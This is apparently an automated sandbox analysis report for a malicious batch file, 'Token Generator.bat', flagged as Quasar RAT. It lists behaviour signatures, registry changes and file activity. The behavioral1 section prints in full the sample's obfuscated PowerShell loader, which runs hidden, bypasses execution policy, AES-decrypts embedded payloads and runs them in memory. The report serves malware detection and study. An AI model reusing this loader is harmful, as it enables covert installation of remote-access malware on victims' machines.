Malware Analysis Report

2024-10-19 06:33

Sample ID 240527-12tfcach85
Target Token Generator.bat
SHA256 9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
Tags
execution quasar token gen bootkit discovery persistence spyware trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b

Threat Level: Known bad

The file Token Generator.bat was found to be: Known bad.

Malicious Activity Summary

execution quasar token gen bootkit discovery persistence spyware trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar RAT

Quasar payload

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Drops file in Drivers directory

Sets service image path in registry

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 22:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 22:09

Reported

2024-05-27 22:09

Platform

win7-20240508-en

Max time kernel

3s

Max time network

0s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2316-4-0x000007FEF649E000-0x000007FEF649F000-memory.dmp

memory/2316-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2316-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2316-7-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-8-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-10-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-9-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-11-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

memory/2316-12-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 22:09

Reported

2024-05-27 22:11

Platform

win10v2004-20240426-en

Max time kernel

115s

Max time network

117s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4860 created 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat C:\Users\Admin\Downloads\MBSetup.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\MBSetup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\Downloads\MBSetup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Discord C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4860 set thread context of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Malwarebytes\04c273931c7611ef853afe5db4a87adc C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\04c273941c7611efac30fe5db4a87adc C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File created C:\Program Files (x86)\mbamtestfile.dat C:\Users\Admin\Downloads\MBSetup.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\c0f5b849-948f-4f90-a096-7c4bf9ebb704 C:\Users\Admin\Downloads\MBSetup.exe N/A
File created C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe C:\Users\Admin\Downloads\MBSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = [binary value not captured in report] C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018400E1E99464E" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
